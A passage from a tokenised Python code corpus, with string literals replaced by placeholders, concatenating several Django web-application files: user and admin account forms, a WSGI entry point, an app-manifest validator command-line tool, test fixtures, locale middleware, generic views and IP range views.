( '<STR_LIT>' % <EOL> ( settings . MAX_PHOTO_UPLOAD_SIZE / <NUM_LIT> / <NUM_LIT> - <NUM_LIT:1> ) ) ) <EOL> return photo <EOL> def clean_bio ( self ) : <EOL> bio = self . cleaned_data [ '<STR_LIT>' ] <EOL> normalized = clean_nl ( unicode ( bio ) ) <EOL> if has_links ( normalized ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' ) ) <EOL> return bio <EOL> def save ( self , log_for_developer = True ) : <EOL> u = super ( UserEditForm , self ) . save ( commit = False ) <EOL> data = self . cleaned_data <EOL> photo = data [ '<STR_LIT>' ] <EOL> if photo : <EOL> u . picture_type = '<STR_LIT>' <EOL> tmp_destination = u . picture_path + '<STR_LIT>' <EOL> with storage . open ( tmp_destination , '<STR_LIT:wb>' ) as fh : <EOL> for chunk in photo . chunks ( ) : <EOL> fh . write ( chunk ) <EOL> tasks . resize_photo . delay ( tmp_destination , u . picture_path , <EOL> set_modified_on = [ u ] ) <EOL> if data [ '<STR_LIT:password>' ] : <EOL> u . set_password ( data [ '<STR_LIT:password>' ] ) <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , username = u . username , <EOL> signature = '<STR_LIT>' , msg = '<STR_LIT>' ) <EOL> if log_for_developer : <EOL> amo . log ( amo . LOG . CHANGE_PASSWORD ) <EOL> log . info ( u'<STR_LIT>' % u ) <EOL> for ( i , n ) in email . NOTIFICATIONS_BY_ID . items ( ) : <EOL> enabled = n . mandatory or ( str ( i ) in data [ '<STR_LIT>' ] ) <EOL> UserNotification . update_or_create ( <EOL> user = u , notification_id = i , update = { '<STR_LIT>' : enabled } ) <EOL> log . debug ( u'<STR_LIT>' % u ) <EOL> u . save ( ) <EOL> return u <EOL> class BaseAdminUserEditForm ( object ) : <EOL> def changed_fields ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( set ( self . changed_data ) - <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:password>' , '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> def changes ( self ) : <EOL> """<STR_LIT>""" <EOL> details = dict ( [ ( k , ( self . initial [ k ] , self . cleaned_data [ k ] ) ) <EOL> for k in self . changed_fields ( ) ] ) <EOL> if '<STR_LIT:password>' in self . changed_data : <EOL> details [ '<STR_LIT:password>' ] = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> return details <EOL> def clean_anonymize ( self ) : <EOL> if ( self . cleaned_data [ '<STR_LIT>' ] and <EOL> self . changed_fields ( ) != set ( [ '<STR_LIT>' ] ) ) : <EOL> raise forms . ValidationError ( _ ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) ) <EOL> return self . cleaned_data [ '<STR_LIT>' ] <EOL> class AdminUserEditForm ( BaseAdminUserEditForm , UserEditForm ) : <EOL> """<STR_LIT>""" <EOL> admin_log = forms . CharField ( required = True , label = '<STR_LIT>' , <EOL> widget = RequiredTextarea ( attrs = { '<STR_LIT>' : <NUM_LIT:4> } ) ) <EOL> confirmationcode = forms . CharField ( required = False , max_length = <NUM_LIT:255> , <EOL> label = '<STR_LIT>' ) <EOL> notes = forms . CharField ( required = False , label = '<STR_LIT>' , <EOL> widget = forms . Textarea ( attrs = { '<STR_LIT>' : <NUM_LIT:4> } ) ) <EOL> anonymize = forms . BooleanField ( required = False ) <EOL> def save ( self , * args , ** kw ) : <EOL> profile = super ( AdminUserEditForm , self ) . save ( log_for_developer = False ) <EOL> if self . cleaned_data [ '<STR_LIT>' ] : <EOL> amo . log ( amo . LOG . ADMIN_USER_ANONYMIZED , self . instance , <EOL> self . cleaned_data [ '<STR_LIT>' ] ) <EOL> profile . anonymize ( ) <EOL> else : <EOL> amo . log ( amo . LOG . ADMIN_USER_EDITED , self . instance , <EOL> self . cleaned_data [ '<STR_LIT>' ] , details = self . changes ( ) ) <EOL> log . info ( '<STR_LIT>' % <EOL> ( self . instance , self . changed_fields ( ) ) ) <EOL> if '<STR_LIT:password>' in self . changes ( ) : <EOL> log_cef ( '<STR_LIT>' , <NUM_LIT:5> , self . request , <EOL> username = self . instance . username , <EOL> signature = '<STR_LIT>' , <EOL> msg = '<STR_LIT>' , <EOL> cs1 = self . request . user . username , <EOL> cs1Label = '<STR_LIT>' ) <EOL> return profile <EOL> class BlacklistedNameAddForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> names = forms . CharField ( widget = forms . Textarea ( <EOL> attrs = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:16> } ) ) <EOL> def clean_names ( self ) : <EOL> names = self . cleaned_data [ '<STR_LIT>' ] . strip ( ) <EOL> if not names : <EOL> raise forms . ValidationError ( <EOL> _ ( '<STR_LIT>' ) ) <EOL> names = os . linesep . join ( <EOL> [ s . strip ( ) for s in names . splitlines ( ) if s . strip ( ) ] ) <EOL> return names <EOL> class BlacklistedEmailDomainAddForm ( forms . Form ) : <EOL> """<STR_LIT>""" <EOL> domains = forms . CharField ( <EOL> widget = forms . Textarea ( attrs = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT:16> } ) ) <EOL> def clean ( self ) : <EOL> super ( BlacklistedEmailDomainAddForm , self ) . clean ( ) <EOL> data = self . cleaned_data <EOL> if '<STR_LIT>' in data : <EOL> l = filter ( None , [ s . strip ( ) for s in data [ '<STR_LIT>' ] . splitlines ( ) ] ) <EOL> data [ '<STR_LIT>' ] = os . linesep . join ( l ) <EOL> if not data . get ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> msg = '<STR_LIT>' <EOL> self . _errors [ '<STR_LIT>' ] = ErrorList ( [ msg ] ) <EOL> return data </s>
<s> import os <EOL> import logging <EOL> import sys <EOL> from datetime import datetime <EOL> log = logging . getLogger ( '<STR_LIT>' ) <EOL> wsgi_loaded = datetime . now ( ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> import django <EOL> import django . conf <EOL> from django . core . wsgi import get_wsgi_application <EOL> import django . core . management <EOL> import django . utils <EOL> django . setup ( ) <EOL> django . utils . translation . activate ( django . conf . settings . LANGUAGE_CODE ) <EOL> utility = django . core . management . ManagementUtility ( ) <EOL> command = utility . fetch_command ( '<STR_LIT>' ) <EOL> command . validate ( ) <EOL> django_app = get_wsgi_application ( ) <EOL> def application ( env , start_response ) : <EOL> if '<STR_LIT>' in env : <EOL> env [ '<STR_LIT>' ] = env [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> env [ '<STR_LIT>' ] = wsgi_loaded <EOL> env [ '<STR_LIT>' ] = django . conf . settings . HOSTNAME <EOL> env [ '<STR_LIT>' ] = str ( datetime . now ( ) ) <EOL> return django_app ( env , start_response ) <EOL> newrelic_ini = getattr ( django . conf . settings , '<STR_LIT>' , None ) <EOL> if newrelic_ini : <EOL> import newrelic . agent <EOL> try : <EOL> newrelic . agent . initialize ( newrelic_ini ) <EOL> except Exception : <EOL> log . exception ( '<STR_LIT>' ) <EOL> application = newrelic . agent . wsgi_application ( ) ( application ) </s>
<s> import sys <EOL> import argparse <EOL> import requests <EOL> from . import validate_app , validate_packaged_app <EOL> def main ( ) : <EOL> "<STR_LIT>" <EOL> parser = argparse . ArgumentParser ( <EOL> description = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT:text>" , <EOL> choices = ( "<STR_LIT:text>" , "<STR_LIT>" ) , <EOL> help = "<STR_LIT>" , <EOL> required = False ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> const = True , <EOL> help = """<STR_LIT>""" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> const = True , <EOL> help = """<STR_LIT>""" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> const = True , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> default = "<STR_LIT>" ) <EOL> parser . add_argument ( "<STR_LIT>" , <EOL> action = "<STR_LIT>" , <EOL> const = True , <EOL> help = "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> try : <EOL> timeout = int ( args . timeout ) <EOL> except ValueError : <EOL> print "<STR_LIT>" <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if "<STR_LIT>" in args . package : <EOL> error_bundle = validate_app ( <EOL> requests . get ( args . package ) . content , listed = not args . unlisted , <EOL> format = None , url = args . package , acorn = args . acorn ) <EOL> elif args . package . endswith ( "<STR_LIT>" ) : <EOL> with open ( args . package ) as f : <EOL> error_bundle = validate_app ( <EOL> f . read ( ) , listed = not args . unlisted , format = None , <EOL> acorn = args . acorn ) <EOL> else : <EOL> error_bundle = validate_packaged_app ( <EOL> args . package , listed = not args . unlisted , format = None , <EOL> timeout = timeout , acorn = args . acorn ) <EOL> if args . output == "<STR_LIT:text>" : <EOL> print error_bundle . print_summary ( <EOL> verbose = args . verbose , no_color = args . boring ) . encode ( "<STR_LIT:utf-8>" ) <EOL> elif args . output == "<STR_LIT>" : <EOL> sys . stdout . write ( error_bundle . render_json ( ) ) <EOL> if error_bundle . failed ( ) : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> else : <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> import json <EOL> import unicodehelper <EOL> from . specs . webapps import WebappSpec <EOL> def detect_webapp ( err , package ) : <EOL> """<STR_LIT>""" <EOL> with open ( package , mode = "<STR_LIT:r>" ) as f : <EOL> detect_webapp_string ( err , f . read ( ) ) <EOL> def detect_webapp_string ( err , data ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> u_data = unicodehelper . decode ( data ) <EOL> webapp = json . loads ( u_data ) <EOL> except ValueError as exc : <EOL> err . error ( <EOL> err_id = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> error = "<STR_LIT>" , <EOL> description = [ "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> unicode ( exc ) ] ) <EOL> else : <EOL> ws = WebappSpec ( webapp , err ) <EOL> ws . validate ( ) <EOL> def long_name_warning ( appendix = None ) : <EOL> if appendix : <EOL> appendix = [ appendix ] <EOL> else : <EOL> appendix = [ ] <EOL> err . warning ( <EOL> err_id = ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) , <EOL> warning = "<STR_LIT>" , <EOL> description = [ "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ] + appendix ) <EOL> def test_name ( locale , appendix = None ) : <EOL> if not isinstance ( locale , dict ) : <EOL> return <EOL> name = locale . get ( "<STR_LIT:name>" ) <EOL> if name and isinstance ( name , ( str , unicode ) ) and len ( name ) > <NUM_LIT:12> : <EOL> long_name_warning ( appendix ) <EOL> test_name ( webapp ) <EOL> locales = webapp . get ( "<STR_LIT>" ) <EOL> if locales and isinstance ( locales , dict ) : <EOL> for locale in locales : <EOL> test_name ( locales [ locale ] , '<STR_LIT>' % locale ) <EOL> if not err . failed ( fail_on_warnings = False ) : <EOL> err . save_resource ( "<STR_LIT>" , webapp ) <EOL> return webapp </s>
<s> from js_helper import TestCase <EOL> class TestFunctionTraversal ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_function_declaration_order ( self ) : <EOL> """<STR_LIT>""" <EOL> self . run_script ( """<STR_LIT>""" ) <EOL> self . assert_var_eq ( "<STR_LIT:bar>" , "<STR_LIT>" ) <EOL> self . assert_var_eq ( "<STR_LIT:foo>" , "<STR_LIT>" ) <EOL> def test_function_expression_order ( self ) : <EOL> """<STR_LIT>""" <EOL> self . run_script ( """<STR_LIT>""" ) <EOL> self . assert_var_eq ( "<STR_LIT:bar>" , "<STR_LIT>" ) <EOL> self . assert_var_eq ( "<STR_LIT:foo>" , "<STR_LIT>" ) <EOL> def test_nested_functions ( self ) : <EOL> """<STR_LIT>""" <EOL> self . run_script ( """<STR_LIT>""" ) <EOL> self . assert_var_eq ( "<STR_LIT:foo>" , "<STR_LIT>" ) </s>
<s> def in_ ( l , a , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if a not in l : <EOL> raise AssertionError ( msg or "<STR_LIT>" % ( a , l ) ) </s>
<s> import random <EOL> from string import letters <EOL> from django . contrib . auth import get_user_model <EOL> from django . test import TestCase <EOL> try : <EOL> from django . test import override_settings <EOL> except ImportError : <EOL> from django . test . utils import override_settings <EOL> from tidings . models import Watch , WatchFilter <EOL> def user ( save = False , ** kwargs ) : <EOL> defaults = { '<STR_LIT:password>' : <EOL> '<STR_LIT>' } <EOL> if '<STR_LIT:username>' not in kwargs : <EOL> defaults [ '<STR_LIT:username>' ] = '<STR_LIT>' . join ( random . choice ( letters ) <EOL> for x in xrange ( <NUM_LIT:15> ) ) <EOL> defaults . update ( kwargs ) <EOL> u = get_user_model ( ) ( ** defaults ) <EOL> if save : <EOL> u . save ( ) <EOL> return u <EOL> def watch ( save = False , ** kwargs ) : <EOL> defaults = { '<STR_LIT:user>' : kwargs . get ( '<STR_LIT:user>' ) or user ( ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> defaults . update ( kwargs ) <EOL> w = Watch . objects . create ( ** defaults ) <EOL> if save : <EOL> w . save ( ) <EOL> return w <EOL> def watch_filter ( save = False , ** kwargs ) : <EOL> defaults = { '<STR_LIT>' : kwargs . get ( '<STR_LIT>' ) or watch ( ) , <EOL> '<STR_LIT:name>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:value>' : <NUM_LIT> } <EOL> defaults . update ( kwargs ) <EOL> f = WatchFilter . objects . create ( ** defaults ) <EOL> if save : <EOL> f . save ( ) <EOL> return f </s>
<s> from elasticutils . contrib . django import MappingType , Indexable <EOL> _model_cache = [ ] <EOL> def reset_model_cache ( ) : <EOL> del _model_cache [ <NUM_LIT:0> : ] <EOL> class Meta ( object ) : <EOL> def __init__ ( self , db_table ) : <EOL> self . db_table = db_table <EOL> class SearchQuerySet ( object ) : <EOL> def __init__ ( self , model ) : <EOL> self . model = model <EOL> self . steps = [ ] <EOL> def get ( self , pk ) : <EOL> pk = int ( pk ) <EOL> return [ m for m in _model_cache if m . id == pk ] [ <NUM_LIT:0> ] <EOL> def filter ( self , id__in = None ) : <EOL> self . steps . append ( ( '<STR_LIT>' , id__in ) ) <EOL> return self <EOL> def order_by ( self , * fields ) : <EOL> self . steps . append ( ( '<STR_LIT>' , fields ) ) <EOL> return self <EOL> def values_list ( self , * args , ** kwargs ) : <EOL> self . steps . append ( ( '<STR_LIT>' , args , kwargs . pop ( '<STR_LIT>' , False ) ) ) <EOL> return self <EOL> def __iter__ ( self ) : <EOL> order_by = None <EOL> values_list = None <EOL> objs = _model_cache <EOL> for mem in self . steps : <EOL> if mem [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> objs = [ obj for obj in objs if obj . id in mem [ <NUM_LIT:1> ] ] <EOL> elif mem [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> order_by_field = mem [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] <EOL> elif mem [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> values_list = ( mem [ <NUM_LIT:1> ] , mem [ <NUM_LIT:2> ] ) <EOL> if order_by : <EOL> objs . sort ( key = getattr ( obj , order_by_field ) ) <EOL> if values_list : <EOL> objs = [ obj . id for obj in objs ] <EOL> return iter ( objs ) <EOL> class Manager ( object ) : <EOL> def get_query_set ( self ) : <EOL> return SearchQuerySet ( self ) <EOL> def get ( self , pk ) : <EOL> return self . get_query_set ( ) . get ( pk ) <EOL> def filter ( self , * args , ** kwargs ) : <EOL> return self . get_query_set ( ) . filter ( * args , ** kwargs ) <EOL> def order_by ( self , * args , ** kwargs ) : <EOL> return self . get_query_set ( ) . order_by ( * args , ** kwargs ) <EOL> def values_list ( self , * args , ** kwargs ) : <EOL> return self . get_query_set ( ) . values_list ( * args , ** kwargs ) <EOL> class FakeModel ( object ) : <EOL> _meta = Meta ( '<STR_LIT>' ) <EOL> objects = Manager ( ) <EOL> def __init__ ( self , ** kw ) : <EOL> self . _doc = kw <EOL> for key in kw : <EOL> setattr ( self , key , kw [ key ] ) <EOL> _model_cache . append ( self ) <EOL> class FakeDjangoMappingType ( MappingType , Indexable ) : <EOL> @ classmethod <EOL> def get_model ( cls ) : <EOL> return FakeModel <EOL> @ classmethod <EOL> def extract_document ( cls , obj_id , obj = None ) : <EOL> if obj is None : <EOL> raise ValueError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return obj . _doc </s>
<s> """<STR_LIT>""" <EOL> import urllib <EOL> from warnings import warn <EOL> from django . conf import settings <EOL> from django . http import HttpResponsePermanentRedirect <EOL> from django . utils . encoding import smart_str <EOL> import tower <EOL> from . import urlresolvers <EOL> from . helpers import urlparams <EOL> class LocaleURLMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> if not settings . USE_I18N or not settings . USE_L10N : <EOL> warn ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . exempt_urls = getattr ( settings , '<STR_LIT>' , ( ) ) <EOL> def _is_lang_change ( self , request ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in request . GET : <EOL> return False <EOL> return not any ( request . path . endswith ( url ) for url in self . exempt_urls ) <EOL> def process_request ( self , request ) : <EOL> prefixer = urlresolvers . Prefixer ( request ) <EOL> urlresolvers . set_url_prefix ( prefixer ) <EOL> full_path = prefixer . fix ( prefixer . shortened_path ) <EOL> if self . _is_lang_change ( request ) : <EOL> prefixer . locale = '<STR_LIT>' <EOL> new_path = prefixer . fix ( prefixer . shortened_path ) <EOL> query = dict ( ( smart_str ( k ) , request . GET [ k ] ) for k in request . GET ) <EOL> query . pop ( '<STR_LIT>' ) <EOL> return HttpResponsePermanentRedirect ( urlparams ( new_path , ** query ) ) <EOL> if full_path != request . path : <EOL> query_string = request . META . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> full_path = urllib . quote ( full_path . encode ( '<STR_LIT:utf-8>' ) ) <EOL> if query_string : <EOL> full_path = '<STR_LIT>' % ( full_path , query_string ) <EOL> response = HttpResponsePermanentRedirect ( full_path ) <EOL> old_locale = prefixer . locale <EOL> new_locale , _ = urlresolvers . split_path ( full_path ) <EOL> if old_locale != new_locale : <EOL> response [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return response <EOL> request . path_info = '<STR_LIT:/>' + prefixer . shortened_path <EOL> request . locale = prefixer . locale <EOL> tower . activate ( prefixer . locale ) </s>
<s> from django . contrib import messages <EOL> from django . forms import ValidationError <EOL> from django . db import IntegrityError <EOL> from django . shortcuts import redirect , render , get_object_or_404 <EOL> from django . views . generic import DeleteView <EOL> from django . views . generic import DetailView <EOL> from django . views . generic import CreateView <EOL> from django . views . generic import UpdateView <EOL> from django . views . generic import ListView <EOL> class BaseListView ( ListView ) : <EOL> """<STR_LIT>""" <EOL> template_name = '<STR_LIT>' <EOL> class BaseDetailView ( DetailView ) : <EOL> template_name = '<STR_LIT>' <EOL> extra_context = None <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( DetailView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> class BaseCreateView ( CreateView ) : <EOL> template_name = "<STR_LIT>" <EOL> extra_context = None <EOL> def post ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> obj = super ( BaseCreateView , self ) . post ( request , * args , ** kwargs ) <EOL> except ( IntegrityError , ValidationError ) , e : <EOL> messages . error ( request , str ( e ) ) <EOL> request . method = '<STR_LIT:GET>' <EOL> return super ( BaseCreateView , self ) . get ( request , * args , ** kwargs ) <EOL> return obj <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> return super ( BaseCreateView , self ) . get ( request , * args , ** kwargs ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( CreateView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> class BaseUpdateView ( UpdateView ) : <EOL> template_name = "<STR_LIT>" <EOL> extra_context = None <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( UpdateView , self ) . __init__ ( * args , ** kwargs ) <EOL> def get_form ( self , form_class ) : <EOL> form = super ( BaseUpdateView , self ) . get_form ( form_class ) <EOL> return form <EOL> def post ( self , request , * args , ** kwargs ) : <EOL> try : <EOL> obj = super ( BaseUpdateView , self ) . post ( request , * args , ** kwargs ) <EOL> except ValidationError , e : <EOL> messages . error ( request , str ( e ) ) <EOL> request . method = '<STR_LIT:GET>' <EOL> return super ( BaseUpdateView , self ) . get ( request , * args , ** kwargs ) <EOL> return obj <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> return super ( BaseUpdateView , self ) . get ( request , * args , ** kwargs ) <EOL> def get_context_data ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> context = super ( UpdateView , self ) . get_context_data ( ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> class BaseDeleteView ( DeleteView ) : <EOL> template_name = '<STR_LIT>' <EOL> success_url = '<STR_LIT:/>' <EOL> def get_object ( self , queryset = None ) : <EOL> obj = super ( BaseDeleteView , self ) . get_object ( ) <EOL> return obj <EOL> def delete ( self , request , * args , ** kwargs ) : <EOL> obj = get_object_or_404 ( <EOL> self . form_class . Meta . model , pk = kwargs . get ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> ) <EOL> try : <EOL> view = super ( BaseDeleteView , self ) . delete ( request , * args , ** kwargs ) <EOL> except ValidationError , e : <EOL> messages . error ( request , "<STR_LIT>" . format ( '<STR_LIT:U+0020>' . join ( e . messages ) ) ) <EOL> return redirect ( obj ) <EOL> messages . success ( request , "<STR_LIT>" ) <EOL> return view <EOL> class Base ( DetailView ) : <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> return render ( request , "<STR_LIT>" ) </s>
<s> from django . db import models <EOL> from django . db . models import Q <EOL> from django . core . exceptions import ValidationError <EOL> class KeyValue ( models . Model ) : <EOL> """<STR_LIT>""" <EOL> id = models . AutoField ( primary_key = True ) <EOL> key = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> value = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> force_validation = False <EOL> class Meta : <EOL> abstract = True <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self ) <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . key , self . value ) <EOL> @ property <EOL> def uri ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . __class__ . __name__ . lower ( ) , self . pk <EOL> ) <EOL> def get_absolute_url ( self ) : <EOL> return '<STR_LIT>' . format ( <EOL> self . __class__ . __name__ . lower ( ) , self . obj . pk <EOL> ) <EOL> def get_bundle ( self ) : <EOL> return { <EOL> '<STR_LIT:key>' : self . key , '<STR_LIT:value>' : self . value , '<STR_LIT>' : self . uri , <EOL> '<STR_LIT>' : self . pk , '<STR_LIT>' : self . obj . pk <EOL> } <EOL> def clean ( self , require_validation = True , check_unique = True ) : <EOL> key_attr = self . key . replace ( '<STR_LIT:->' , '<STR_LIT:_>' ) <EOL> if ( not hasattr ( self , key_attr ) and <EOL> not hasattr ( self , "<STR_LIT>" + key_attr ) ) : <EOL> if self . force_validation and require_validation : <EOL> raise ValidationError ( "<STR_LIT>" % self . key ) <EOL> else : <EOL> if check_unique : <EOL> self . validate_unique ( ) <EOL> return <EOL> if hasattr ( self , key_attr ) : <EOL> validate = getattr ( self , key_attr ) <EOL> else : <EOL> validate = getattr ( self , "<STR_LIT>" + key_attr ) <EOL> if not callable ( validate ) : <EOL> raise ValidationError ( "<STR_LIT>" % <EOL> key_attr ) <EOL> try : <EOL> validate ( ) <EOL> except TypeError , e : <EOL> raise ValidationError ( "<STR_LIT:%s>" % str ( e ) ) <EOL> if check_unique : <EOL> self . validate_unique ( ) <EOL> def validate_unique ( self ) : <EOL> if ( self . __class__ . objects . filter ( <EOL> key = self . key , value = self . value , obj = self . obj ) . <EOL> filter ( ~ Q ( id = self . pk ) ) . exists ( ) ) : <EOL> raise ValidationError ( "<STR_LIT>" ) </s>
<s> from django . core . exceptions import ValidationError <EOL> from django . shortcuts import get_object_or_404 <EOL> from django . shortcuts import render <EOL> from django . http import HttpResponse <EOL> from core . utils import int_to_ip , resolve_ip_type <EOL> from core . range . forms import RangeForm <EOL> from core . range . utils import range_usage <EOL> from core . range . ip_choosing_utils import ( <EOL> calculate_filters , label_value_maker , calc_template_ranges , <EOL> integrate_real_ranges , UN <EOL> ) <EOL> from core . range . models import Range <EOL> from core . site . models import Site <EOL> from core . vlan . models import Vlan <EOL> from core . network . models import Network <EOL> from mozdns . ip . models import ipv6_to_longs <EOL> from core . views import CoreDeleteView , CoreDetailView <EOL> from core . views import CoreCreateView , CoreUpdateView , CoreListView <EOL> import ipaddr <EOL> import simplejson as json <EOL> class RangeView ( object ) : <EOL> model = Range <EOL> form_class = RangeForm <EOL> queryset = Range . objects . all ( ) <EOL> class RangeDeleteView ( RangeView , CoreDeleteView ) : <EOL> pass <EOL> class RangeCreateView ( RangeView , CoreCreateView ) : <EOL> def get_form ( self , form_class ) : <EOL> if not self . request . POST : <EOL> initial = { } <EOL> initial . update ( dict ( self . request . GET . items ( ) ) ) <EOL> return form_class ( initial = initial ) <EOL> else : <EOL> return super ( RangeCreateView , self ) . get_form ( form_class ) <EOL> class RangeUpdateView ( RangeView , CoreUpdateView ) : <EOL> template_name = "<STR_LIT>" <EOL> class RangeListView ( RangeView , CoreListView ) : <EOL> template_name = "<STR_LIT>" <EOL> class RangeDetailView ( RangeView , CoreDetailView ) : <EOL> template_name = '<STR_LIT>' <EOL> def get_context_data ( self , ** kwargs ) : <EOL> context = super ( RangeDetailView , self ) . get_context_data ( <EOL> ** kwargs ) <EOL> context [ '<STR_LIT>' ] = "<STR_LIT>" . format ( <EOL> self . form_class . Meta . model . __name__ <EOL> ) <EOL> if self . extra_context : <EOL> context = dict ( context . items ( ) + self . extra_context . items ( ) ) <EOL> return context <EOL> def range_usage_text ( request ) : <EOL> start = request . GET . get ( '<STR_LIT:start>' , None ) <EOL> end = request . GET . get ( '<STR_LIT:end>' , None ) <EOL> format = request . GET . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not ( start and end ) : <EOL> return HttpResponse ( json . dumps ( { <EOL> '<STR_LIT:success>' : False , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) ) <EOL> get_objects = request . GET . get ( '<STR_LIT>' , False ) <EOL> if start . find ( '<STR_LIT::>' ) > - <NUM_LIT:1> : <EOL> ip_type = '<STR_LIT>' <EOL> else : <EOL> ip_type = '<STR_LIT:4>' <EOL> try : <EOL> usage_data = range_usage ( start , end , ip_type , get_objects ) <EOL> except ( ValidationError , ipaddr . AddressValueError ) , e : <EOL> return HttpResponse ( <EOL> json . dumps ( { <EOL> '<STR_LIT>' : str ( e ) , <EOL> '<STR_LIT:success>' : False <EOL> } ) ) <EOL> if format == '<STR_LIT>' : <EOL> usage_data [ '<STR_LIT>' ] = map ( lambda x : ( int_to_ip ( x [ <NUM_LIT:0> ] , ip_type ) , <EOL> int_to_ip ( x [ <NUM_LIT:1> ] , ip_type ) ) , <EOL> usage_data [ '<STR_LIT>' ] ) <EOL> usage_data [ '<STR_LIT:success>' ] = True <EOL> return HttpResponse ( json . dumps ( usage_data ) ) <EOL> def range_usage_ajax ( request ) : <EOL> start = request . GET . get ( '<STR_LIT:start>' , None ) <EOL> end = request . GET . get ( '<STR_LIT:end>' , None ) <EOL> start_ip_type , _ = resolve_ip_type ( start ) <EOL> end_ip_type , _ = resolve_ip_type ( end ) <EOL> errors = None <EOL> if start_ip_type != end_ip_type or start_ip_type is None : <EOL> errors = "<STR_LIT>" <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : errors , <EOL> } ) <EOL> rusage = range_usage ( start , end , start_ip_type , get_objects = True ) <EOL> def translate_ip ( ip_i , * args ) : <EOL> return int_to_ip ( ip_i , start_ip_type ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> '<STR_LIT>' : errors , <EOL> '<STR_LIT:start>' : start , <EOL> '<STR_LIT:end>' : end , <EOL> '<STR_LIT>' : int_to_ip ( start , start_ip_type ) , <EOL> '<STR_LIT>' : int_to_ip ( end , end_ip_type ) , <EOL> '<STR_LIT>' : rusage , <EOL> '<STR_LIT>' : translate_ip <EOL> } ) <EOL> def range_detail ( request , range_pk ) : <EOL> mrange = get_object_or_404 ( Range , pk = range_pk ) <EOL> attrs = mrange . keyvalue_set . all ( ) <EOL> return render ( request , '<STR_LIT>' , { <EOL> 